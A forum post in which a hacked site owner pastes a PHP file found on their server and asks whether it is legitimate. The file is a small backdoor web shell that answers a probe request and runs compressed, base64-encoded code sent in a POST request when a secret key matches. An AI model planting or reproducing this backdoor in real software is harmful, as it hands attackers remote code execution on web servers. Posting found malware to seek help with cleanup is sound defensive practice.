If(isset) / eval / base64_decode / and more



First of all, I found you on Google and I might be totally wrong to write this here. I am new to this site - my apologies if so is the case! I hope someone has the time and feel like helping out :slight_smile:

I have a PHP file that contains below and we have been hacked.
I have removed a bunch of extra-added <?php etc.. statements in many other of the PHP files throughout the site, but I think below actually might be someone that coded something a while back that is actually needed.
I don't know what it does and someone suggested I rewrite it but not sure how to do that.
If I just remove the file.. if it's placed there by the hack then it's safe to remove but if not then the site will not work without it.. not sure what to do next?
The other 'hack-code' are within files that have other legitimate code in them, besides the hack, so I remove only the hack-lines then save it, and that's it.
But, below is from a file where there is only this code in all of the file - that is why I wonder if it might be legitimate although bad coding, so to speak. Or not?

<?php  if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="[KEY REMOVED FOR SECURITY]")eval(gzuncompress(base64_decode($_POST["chk"]))); ?>


This topic was automatically closed 7 days after the last reply. New replies are no longer allowed.